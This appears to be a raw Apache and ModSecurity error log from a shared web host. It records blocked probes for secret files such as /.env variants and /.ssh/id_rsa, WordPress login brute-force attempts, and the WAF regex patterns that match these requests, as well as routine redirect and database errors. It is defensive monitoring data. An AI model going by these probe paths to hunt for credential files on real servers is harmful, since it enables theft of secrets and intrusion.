[Tue May 26 14:52:19.036187 2026] [security2:error] [pid 658374:tid 658520] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmSp1Mb7_aby-E0Kcg9gAAABA"]
[Tue May 26 14:52:19.084547 2026] [core:error] [pid 658374:tid 658554] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.084567 2026] [core:error] [pid 658374:tid 658554] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.307437 2026] [core:error] [pid 658374:tid 658559] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.307459 2026] [core:error] [pid 658374:tid 658559] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.424685 2026] [security2:error] [pid 658374:tid 658539] [client 173.239.240.34:64547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVmS51Mb7_aby-E0KchDQAAACM"]
[Tue May 26 14:52:19.703361 2026] [security2:error] [pid 658374:tid 658506] [client 34.73.215.69:52245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.215.73.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVmS51Mb7_aby-E0KchJgAAAAI"]
[Tue May 26 14:52:19.879183 2026] [security2:error] [pid 658374:tid 658602] [client 34.73.215.69:63372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVmS51Mb7_aby-E0KchMQAAAGI"]
[Tue May 26 14:52:20.020254 2026] [security2:error] [pid 658374:tid 658589] [client 34.73.215.69:60252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchOwAAAFU"]
[Tue May 26 14:52:20.053400 2026] [security2:error] [pid 658374:tid 658537] [client 173.239.240.58:45979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVmS51Mb7_aby-E0KchLQAAACE"]
[Tue May 26 14:52:20.162911 2026] [security2:error] [pid 658374:tid 658616] [client 34.73.215.69:58465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchPwAAAHA"]
[Tue May 26 14:52:20.334486 2026] [security2:error] [pid 658374:tid 658542] [client 34.73.215.69:53036] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchQAAAACY"]
[Tue May 26 14:52:20.473348 2026] [security2:error] [pid 658374:tid 658556] [client 34.73.215.69:63823] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchSwAAADQ"]
[Tue May 26 14:52:20.611296 2026] [security2:error] [pid 658374:tid 658511] [client 34.73.215.69:59321] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchUQAAAAc"]
[Tue May 26 14:52:20.775047 2026] [security2:error] [pid 658374:tid 658610] [client 34.73.215.69:58026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchUgAAAGo"]
[Tue May 26 14:52:20.907226 2026] [security2:error] [pid 658374:tid 658558] [client 34.73.215.69:55057] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchVgAAADY"]
[Tue May 26 14:52:21.084588 2026] [security2:error] [pid 658374:tid 658547] [client 34.73.215.69:52159] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTZ1Mb7_aby-E0KchYAAAACs"]
[Tue May 26 14:52:21.195044 2026] [security2:error] [pid 658374:tid 658506] [client 185.191.171.15:24302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVmTZ1Mb7_aby-E0KchaAAAAAI"]
[Tue May 26 14:52:21.195200 2026] [security2:error] [pid 658374:tid 658506] [client 185.191.171.15:24302] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVmTZ1Mb7_aby-E0KchaAAAAAI"]
[Tue May 26 14:52:21.428241 2026] [security2:error] [pid 658374:tid 658560] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmTZ1Mb7_aby-E0KchXgAAADg"]
[Tue May 26 14:52:21.626046 2026] [security2:error] [pid 658374:tid 658552] [client 173.239.240.44:37701] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVmS51Mb7_aby-E0KchDgAAADA"]
[Tue May 26 14:52:24.147130 2026] [security2:error] [pid 658374:tid 658512] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmT51Mb7_aby-E0KchogAAAAg"]
[Tue May 26 14:52:26.727930 2026] [security2:error] [pid 658374:tid 658521] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmUp1Mb7_aby-E0Kch-AAAABE"]
[Tue May 26 14:52:26.799716 2026] [autoindex:error] [pid 658374:tid 658606] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.157117 2026] [autoindex:error] [pid 658374:tid 658599] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.395908 2026] [security2:error] [pid 658374:tid 658614] [client 202.76.169.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmUp1Mb7_aby-E0KciGQAAAG4"]
[Tue May 26 14:52:27.516209 2026] [autoindex:error] [pid 658374:tid 658509] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.880365 2026] [autoindex:error] [pid 658374:tid 658571] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.929077 2026] [security2:error] [pid 658374:tid 658507] [client 65.21.10.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVmUp1Mb7_aby-E0Kch9QAAAAM"], referer: http://yourstorybag.com/blog/
[Tue May 26 14:52:28.217031 2026] [security2:error] [pid 658374:tid 658516] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmU51Mb7_aby-E0KciOgAAAAw"]
[Tue May 26 14:52:30.850924 2026] [security2:error] [pid 658374:tid 658597] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmVp1Mb7_aby-E0KciwwAAAF0"]
[Tue May 26 14:52:31.075503 2026] [autoindex:error] [pid 658374:tid 658554] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:31.436533 2026] [autoindex:error] [pid 658374:tid 658562] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:31.480119 2026] [security2:error] [pid 658374:tid 658550] [client 5.255.99.53:46202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/api/.env"] [unique_id "ahVmV51Mb7_aby-E0Kci_gAAAC4"]
[Tue May 26 14:52:31.548783 2026] [security2:error] [pid 658374:tid 658573] [client 5.255.99.53:46174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env.old"] [unique_id "ahVmV51Mb7_aby-E0KcjCQAAAEU"]
[Tue May 26 14:52:31.766520 2026] [lsapi:warn] [pid 658374:tid 658528] [client 198.235.24.35:58826] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Incorrect key file for table './srsglzts_wp57454/wp4i_options.MYI'; try to repair it for query SELECT option_name, option_value FROM wp4i_options WHERE option_name IN ('_transient_timeout_jetpack_autoloader_plugin_paths') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Shutdown_Handler->__invoke, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Plugins_Handler->cache_plugins, set_transient, wp_prime_option_caches\n
[Tue May 26 14:52:31.988353 2026] [security2:error] [pid 658374:tid 658630] [client 5.255.99.53:46268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahVmV51Mb7_aby-E0KcjLwAAAH4"]
[Tue May 26 14:52:32.053944 2026] [security2:error] [pid 658374:tid 658523] [client 5.255.99.53:48318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env.backup"] [unique_id "ahVmWJ1Mb7_aby-E0KcjPAAAABM"]
[Tue May 26 14:52:32.302950 2026] [security2:error] [pid 658374:tid 658536] [client 5.255.99.53:46202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env.bak"] [unique_id "ahVmWJ1Mb7_aby-E0KcjQwAAACA"]
[Tue May 26 14:52:32.369738 2026] [security2:error] [pid 658374:tid 658545] [client 5.255.99.53:46174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/app/.env"] [unique_id "ahVmWJ1Mb7_aby-E0KcjTwAAACk"]
[Tue May 26 14:52:32.371481 2026] [security2:error] [pid 658374:tid 658612] [client 5.255.99.53:46106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmWJ1Mb7_aby-E0KcjUAAAAGw"]
[Tue May 26 14:52:32.372435 2026] [security2:error] [pid 658374:tid 658612] [client 5.255.99.53:46268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/backend/.env"] [unique_id "ahVmWJ1Mb7_aby-E0KcjUgAAAGw"]
[Tue May 26 14:52:32.374013 2026] [security2:error] [pid 658374:tid 658552] [client 5.255.99.53:46330] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/public/.env"] [unique_id "ahVmWJ1Mb7_aby-E0KcjUwAAADA"]
[Tue May 26 14:52:32.778064 2026] [security2:error] [pid 658374:tid 658505] [client 5.255.99.53:46246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmWJ1Mb7_aby-E0KcjZQAAAAE"]
[Tue May 26 14:52:33.360841 2026] [security2:error] [pid 658374:tid 658520] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmWJ1Mb7_aby-E0KcjcwAAABA"]
[Tue May 26 14:52:35.484523 2026] [security2:error] [pid 658374:tid 658516] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmW51Mb7_aby-E0Kcj0gAAAAw"]
[Tue May 26 14:52:37.436008 2026] [security2:error] [pid 658374:tid 658621] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmXZ1Mb7_aby-E0KckVwAAAHU"], referer: https://www.anujtradingco.com/
[Tue May 26 14:52:37.778382 2026] [security2:error] [pid 658374:tid 658619] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmXZ1Mb7_aby-E0KckZQAAAHM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430734&moderation-hash=a20bc0fb2911a8e00a99b53c3f34fd6d
[Tue May 26 14:52:37.848750 2026] [security2:error] [pid 658374:tid 658618] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmXZ1Mb7_aby-E0KckWwAAAHI"]
[Tue May 26 14:52:39.943859 2026] [security2:error] [pid 658374:tid 658524] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmX51Mb7_aby-E0KckjgAAABQ"]
[Tue May 26 14:52:41.592230 2026] [security2:error] [pid 658374:tid 658513] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmYZ1Mb7_aby-E0KckuAAAAAk"]
[Tue May 26 14:52:41.783228 2026] [security2:error] [pid 658374:tid 658613] [client 45.148.10.5:49114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/web.config"] [unique_id "ahVmYZ1Mb7_aby-E0KckyQAAAG0"]
[Tue May 26 14:52:43.035115 2026] [security2:error] [pid 658374:tid 658550] [client 69.48.202.178:64658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVmYp1Mb7_aby-E0Kck4gAAAC4"], referer: https://anujtradingco.com
[Tue May 26 14:52:43.344945 2026] [security2:error] [pid 658374:tid 658597] [client 69.48.202.178:64747] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVmY51Mb7_aby-E0Kck7AAAAF0"], referer: https://anujtradingco.com
[Tue May 26 14:52:44.449232 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmZJ1Mb7_aby-E0KclCgAAABo"]
[Tue May 26 14:52:46.703749 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmZp1Mb7_aby-E0KclTgAAABo"]
[Tue May 26 14:52:48.398181 2026] [security2:error] [pid 658374:tid 658527] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmZ51Mb7_aby-E0KclggAAABc"]
[Tue May 26 14:52:51.293666 2026] [security2:error] [pid 658374:tid 658505] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmap1Mb7_aby-E0Kcl1QAAAAE"]
[Tue May 26 14:52:53.470980 2026] [security2:error] [pid 658374:tid 658583] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmbZ1Mb7_aby-E0KcmEgAAAE8"]
